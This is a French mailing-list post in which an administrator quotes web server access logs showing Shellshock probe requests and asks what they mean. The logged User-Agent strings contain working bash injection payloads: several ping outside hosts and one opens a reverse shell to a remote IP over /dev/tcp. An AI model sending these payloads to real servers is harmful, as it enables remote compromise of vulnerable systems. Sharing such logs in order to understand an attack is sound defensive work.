daniel huhardeaux a écrit le 26/09/2014 16:40 :
89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"
ou encore
202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"
Et sur un serveur à moi :
access.log:caché:80 209.126.230.72 - - [25/Sep/2014:02:27:44 +0200]
"GET / HTTP/1.0" 302 233 "() { :; }; ping -c 11 209.126.230.74"
"shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
access.log:caché:80 89.207.135.125 - - [25/Sep/2014:14:27:43 +0200]
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 290 "-" "() { :;};
/bin/ping -c 1 198.101.206.138"
Quel est l'impact de ces requêtes?